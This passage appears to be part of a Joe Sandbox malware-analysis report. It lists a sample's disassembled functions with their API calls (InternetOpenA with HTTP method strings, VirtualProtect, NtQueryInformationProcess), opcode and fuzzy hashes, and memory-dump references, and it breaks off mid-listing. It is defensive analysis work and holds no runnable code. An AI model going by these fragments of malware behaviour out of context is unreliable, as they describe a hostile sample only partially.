                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: DELETE$User-Agent:$https://
                                                                • API String ID: 2038078732-3342223048
                                                                • Opcode ID: bb7a23a35aeccf47d26b7e0b7e011371251f66d920211be19b9de4749f54248d
                                                                • Instruction ID: 59ff64c4c04f40f96a2391fff09c6b647a2868e7fe2e34a4a2517ae78c3fea4b
                                                                • Opcode Fuzzy Hash: bb7a23a35aeccf47d26b7e0b7e011371251f66d920211be19b9de4749f54248d
                                                                • Instruction Fuzzy Hash: 699152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 00404C56 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 282networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: TRACE$User-Agent:$https://
                                                                • API String ID: 2038078732-4245147444
                                                                • Opcode ID: ea856ca9ccd87fe9a574a7d844f74af0b1521052991d95727b53541b976b5cd9
                                                                • Instruction ID: 4a7cd93344103a44b17a3bec012e2025edbafedbc0db8b7e0eaab9c75be3b6b1
                                                                • Opcode Fuzzy Hash: ea856ca9ccd87fe9a574a7d844f74af0b1521052991d95727b53541b976b5cd9
                                                                • Instruction Fuzzy Hash: E09152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 00404C24 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 282networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: POST$User-Agent:$https://
                                                                • API String ID: 2038078732-2999137650
                                                                • Opcode ID: 1d48725e9a1469911c21359308ddf85ae05c7f005b1e77a10da23d69cc2a066f
                                                                • Instruction ID: 91ad81a6f0a2ae1cbf91fc5e67c05e120568aad49599a9d4507bd0ae9d5663b6
                                                                • Opcode Fuzzy Hash: 1d48725e9a1469911c21359308ddf85ae05c7f005b1e77a10da23d69cc2a066f
                                                                • Instruction Fuzzy Hash: 089152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 00404C2E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 282networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: HEAD$User-Agent:$https://
                                                                • API String ID: 2038078732-2298113790
                                                                • Opcode ID: 25245cbd43d1e9dd82f343c5c41bda2dbe416a47e2db094533a0ebe60a359162
                                                                • Instruction ID: 07b1c4b4c754ca4108b6a960215e03f6f28ef0c1c77e3a71b00cf8d133b3bc4a
                                                                • Opcode Fuzzy Hash: 25245cbd43d1e9dd82f343c5c41bda2dbe416a47e2db094533a0ebe60a359162
                                                                • Instruction Fuzzy Hash: D19152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 00404C38 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 282networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: PUT$User-Agent:$https://
                                                                • API String ID: 2038078732-1782795204
                                                                • Opcode ID: 25dbd24db00907674965123a4ac95cd42d30cf91d27c815a3c719cab87d6637c
                                                                • Instruction ID: 2ca09188c4cc529878fb38bb36f75d3d79c0742ac98a960d08e24d58fb80322f
                                                                • Opcode Fuzzy Hash: 25dbd24db00907674965123a4ac95cd42d30cf91d27c815a3c719cab87d6637c
                                                                • Instruction Fuzzy Hash: 289152F1F00355ABEF10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 00404C60 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 281networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: CONNECT$User-Agent:$https://
                                                                • API String ID: 2038078732-3179744966
                                                                • Opcode ID: 4d5147f17fc863275bdb6d77018a86dcfed8de162d4a43c42f4863c09cbc1076
                                                                • Instruction ID: 6a66c60d913851a517569f214977a5c33e7fd5abb1e550e5a8e0af8c4c432d4a
                                                                • Opcode Fuzzy Hash: 4d5147f17fc863275bdb6d77018a86dcfed8de162d4a43c42f4863c09cbc1076
                                                                • Instruction Fuzzy Hash: F99162F1F00355ABEF10DE96ECC2B9F77B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 004CA140 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25memorywindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6839 4ca140-4ca147 6840 4ca149-4ca14f GetProcessHeap 6839->6840 6841 4ca154-4ca167 RtlAllocateHeap 6839->6841 6840->6841 6842 4ca169-4ca182 MessageBoxA call 4ca060 6841->6842 6843 4ca185-4ca188 6841->6843 6842->6843
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(004CA9D6,00000009,?,0043987D,00000001,00000001,00000000,80000301), ref: 004CA149
                                                                • RtlAllocateHeap.NTDLL(00890000,00000008,80000301), ref: 004CA15D
                                                                • MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA176
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: 6cc9ae6643fce89fb878b5226d4865382fc2cc6f9f6baca345d6c89dee7f4d46
                                                                • Instruction ID: f9445343b595d22243d3f9e86524e36e45042542ad062984fc3efa72d9019bbb
                                                                • Opcode Fuzzy Hash: 6cc9ae6643fce89fb878b5226d4865382fc2cc6f9f6baca345d6c89dee7f4d46
                                                                • Instruction Fuzzy Hash: 9CE06874A80310BFCB215F24BC49F073B0CAB00B6CF05002DF401E6291EA249C008746
                                                                Function 004DC182 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetVersion.KERNEL32 ref: 004DC1A8
                                                                  • Part of subcall function 004DE497: HeapCreate.KERNEL32(00000000,00001000,00000000,004DC1E0,00000001), ref: 004DE4A8
                                                                  • Part of subcall function 004DE497: HeapDestroy.KERNEL32 ref: 004DE4E7
                                                                • GetCommandLineA.KERNEL32 ref: 004DC208
                                                                • GetStartupInfoA.KERNEL32(?), ref: 004DC233
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004DC256
                                                                  • Part of subcall function 004DC2AF: ExitProcess.KERNEL32 ref: 004DC2CC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                • String ID:
                                                                • API String ID: 2057626494-0
                                                                • Opcode ID: 4cb71da1d703da4d57d4ff24e1180fdef8367a5661f3f4791730dcb98eebb689
                                                                • Instruction ID: 4c17e28815541c3b44c9d9b477b68900f1a8c1745b002ad51bf5e9a14c941108
                                                                • Opcode Fuzzy Hash: 4cb71da1d703da4d57d4ff24e1180fdef8367a5661f3f4791730dcb98eebb689
                                                                • Instruction Fuzzy Hash: 3521B4B0C00316AFDB08AFA6DCAAA6E7BA9EF45704F10012FF501AA391DB3C4440D769
                                                                Function 00454EF8 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 685COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(0000000D,00000000,00000028), ref: 00454FEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID: #$.dll
                                                                • API String ID: 1951056069-2261052886
                                                                • Opcode ID: 727c89a4909ef48bb652a2026ef287f70b9121d9278eb1b8f1751e0945d7fb7c
                                                                • Instruction ID: ed3bc6c084c475aeff6df447bd4f7ab37f5c48f4950614627e78160bed86bcc9
                                                                • Opcode Fuzzy Hash: 727c89a4909ef48bb652a2026ef287f70b9121d9278eb1b8f1751e0945d7fb7c
                                                                • Instruction Fuzzy Hash: F03231B1E00608BBEF50DFA5DC85FEDB7B5EF08305F14402AFA04BA292D77559148B59
                                                                Function 00454585 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 398registryclipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001), ref: 004546D0
                                                                • RegisterClipboardFormatA.USER32(?), ref: 00454A00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClipboardFormatRegisterVersion
                                                                • String ID: ntdll.dll
                                                                • API String ID: 3667372345-2227199552
                                                                • Opcode ID: 30c7b3fd3498b6156dcd68cbbd17286ce9118d9aa5d5f3890251620b00d164ab
                                                                • Instruction ID: 3932ca4b17ef40bc8a5150b00957b1a093bf0598d7dd5dd04f35d68ed63bf2ea
                                                                • Opcode Fuzzy Hash: 30c7b3fd3498b6156dcd68cbbd17286ce9118d9aa5d5f3890251620b00d164ab
                                                                • Instruction Fuzzy Hash: ADD1B4B1E40306ABEB00DFA4DCC2B5A77B4EB55318F24007AEA05AF382D379AD54CB55
                                                                Function 0040ACF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,00000000), ref: 0040ADCF
                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,?,?,?,00000000,?), ref: 0040AEC0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @
                                                                • API String ID: 544645111-2766056989
                                                                • Opcode ID: ce2bc99d04788e5046f016d56dea37d69a29dabca21c849e53ac88aa2ace038b
                                                                • Instruction ID: d2ea49740a1db357f0699095a796fd762f7907ae697645e85e698399e2ce31c4
                                                                • Opcode Fuzzy Hash: ce2bc99d04788e5046f016d56dea37d69a29dabca21c849e53ac88aa2ace038b
                                                                • Instruction Fuzzy Hash: 4161DA75A00319AFDB00DF95D8C1B9EB7B5EF0D301F044066EA04AB352D775AA50DB66
                                                                Function 004CC4E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004CC4F8
                                                                • GetDiskFreeSpaceExA.KERNEL32(?,?,00000000,?), ref: 004CC53F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentDirectoryDiskFreeSpace
                                                                • String ID: :
                                                                • API String ID: 765553577-336475711
                                                                • Opcode ID: 74441a6f68166480527f9f3647b6d28d3e3473f70e540971c0af312ec44d2bf6
                                                                • Instruction ID: 66ef20862a2fa94411cb16bc2f3f96d3e494f4b1d16703b22b006ed3190c8992
                                                                • Opcode Fuzzy Hash: 74441a6f68166480527f9f3647b6d28d3e3473f70e540971c0af312ec44d2bf6
                                                                • Instruction Fuzzy Hash: F601B93520C3419BD310CA28C881FBBBBD8AFD5754F148A1DF599862D1E674D9098797
                                                                Function 00450181 Relevance: 4.6, APIs: 3, Instructions: 120nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,?), ref: 00450222
                                                                • CloseHandle.KERNEL32(00000000), ref: 00450251
                                                                • RtlMoveMemory.NTDLL(?,00000000,00000018), ref: 00450297
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
